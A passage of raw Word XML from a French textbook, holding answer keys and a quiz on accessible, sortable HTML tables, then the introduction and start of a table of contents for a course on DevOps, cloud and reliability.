        <w:t xml:space="preserve">  &lt;caption&gt;Factures de septembre 2026&lt;/caption&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;thead&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Numéro&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col"&gt;Échéance&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="col" class="nombre"&gt;Montant&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/thead&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;tbody&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;th scope="row"&gt;F-2026-091&lt;/th&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;td&gt;30 septembre 2026&lt;/td&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;td class="nombre"&gt;1 240,00 €&lt;/td&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/tr&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/tbody&gt;</w:t>
        <w:br/>
        <w:t>&lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le numéro de facture est un en-tête de ligne : il identifie la ligne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>class="nombre"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>text-align: right</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>font-variant-numeric: tabular-nums</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> aligne les chiffres.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 45.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>// Chaque cellule porte la valeur brute</w:t>
        <w:br/>
        <w:t>// &lt;td class="nombre" data-cle="montant" data-valeur="1240"&gt;1 240,00 €&lt;/td&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>function trier(cle, sens) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const corps = document.querySelector("tbody");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  [...corps.rows]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    .sort((a, b) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      const va = Number(a.querySelector(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[data-cle="${cle}"]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).dataset.valeur);</w:t>
        <w:br/>
        <w:t xml:space="preserve">      const vb = Number(b.querySelector(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[data-cle="${cle}"]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).dataset.valeur);</w:t>
        <w:br/>
        <w:t xml:space="preserve">      return sens === "ascending" ? va - vb : vb - va;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    })</w:t>
        <w:br/>
        <w:t xml:space="preserve">    .forEach((r) =&gt; corps.append(r));</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le texte affiché contient des espaces insécables et un symbole monétaire : le tri alphabétique échoue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un seul en-tête porte </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> à la fois.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 45.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>8 000 lignes en rendu complet : plusieurs secondes de blocage du fil principal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Pagination de 50 lignes : simple, prévisible, coût constant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Virtualisation : utile si le défilement continu est une exigence produit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Décision : pagination côté serveur avec filtre et tri également côté serveur.</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Quand préférer une liste à un tableau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Pour comparer des montants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Pour parcourir des objets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Pour trier</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Pour paginer</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 xml:space="preserve">Que déclare </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>scope="row"</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Une colonne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Un en-tête de ligne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Une légende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Un groupe</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-sort</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Trie réellement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Annonce la colonne et le sens triés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Masque la colonne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Désactive le tri</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Pourquoi temporiser un filtre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Pour la sécurité</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Pour éviter de recalculer à chaque frappe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Pour le cache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Pour l'accessibilité</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Quel état est souvent oublié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Le chargement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L'état vide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 résultat partiel</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La page d'accueil</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Une liste se lit verticalement, sans colonnes à comparer.</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Il identifie la ligne pour les technologies d'assistance.</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Le tri doit être implémenté en JavaScript ou côté serveur.</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Un délai de 150 à 250 ms suffit à réduire la charge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un résultat partiel affiché sans avertissement induit en erreur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId75"/>
          <w:footerReference w:type="default" r:id="rId76"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1474" w:right="1361" w:bottom="1361" w:left="1531" w:header="709" w:footer="652" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SurTitre"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="18"/>
          <w:spacing w:val="60"/>
        </w:rPr>
        <w:t>COURS 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TitreCours"/>
      </w:pPr>
      <w:r>
        <w:t>DevOps, cloud et fiabilité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Concevoir, livrer et exploiter des systèmes logiciels fiables, automatisés et observables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="2" w:color="E0A21B"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ce cours suit l'intégralité de la feuille de route DevOps fournie par l'éditeur : systèmes d'exploitation, terminal, gestion de versions, réseaux, serveurs web, conteneurs, fournisseurs cloud, serverless, provisionnement, gestion de configuration, CI/CD, secrets, supervision, orchestration, GitOps, service mesh et patrons de conception cloud. Il ajoute ce que la feuille de route suppose sans le nommer : messagerie, tests de charge, reprise après sinistre, coûts, plateforme interne et sécurité de la chaîne logicielle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Il ne se contente pas d'énumérer des outils. Chaque chapitre explique le problème que l'outil résout, le modèle mental sous-jacent, puis la mise en œuvre concrète. Les exercices simulent des incidents réels : service qui ne démarre pas, certificat expiré, pipeline bloqué, fuite de secret.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le cours suppose une aisance de base avec un terminal et un langage de programmation. Les rappels nécessaires sont fournis aux chapitres 46 à 53.</w:t>
      </w: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CE QUE CONTIENT CE COURS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>48 chapitres couvrant les quinze domaines de la feuille de route DevOps.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Des centaines de commandes commentées : Linux, Git, Docker, kubectl, Terraform, Ansible.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Des schémas d'architecture : réseau, Kubernetes, pipelines, observabilité.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Des exercices d'incident, des quiz de diagnostic et des études de cas.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un projet final : plateforme complète, du commit à la production.</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COMMENT TRAVAILLER CE COURS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Travaillez dans une machine virtuelle ou un conteneur jetable.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Tapez les commandes une par une et lisez leur sortie avant de continuer.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Pour chaque outil, notez le problème résolu avant d'apprendre la syntaxe.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Automatisez dès la deuxième utilisation manuelle d'une procédure.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Documentez chaque incident : symptôme, hypothèse, test, correctif.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TitreHorsSommaire"/>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Sommaire détaillé du cours</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les pages indiquées renvoient à la pagination continue du volume. Chaque chapitre peut être travaillé indépendamment, dans l'ordre proposé ou selon les besoins du lecteur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Partie I — Culture DevOps et systèmes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>46. La culture DevOps et ses métriques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>425</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>46.1 Le problème d'origine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>426</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>46.2 Trois voies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>427</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>46.3 Les quatre métriques DORA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>427</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>46.4 Les rôles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>428</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>46.5 Les anti-patrons</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>429</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>46.6 Par où commencer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>429</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>47. Linux : système de fichiers, processus et droits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>433</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>47.1 Tout est fichier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>433</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>47.2 L'arborescence normalisée</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>433</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>47.3 Les processus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>434</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
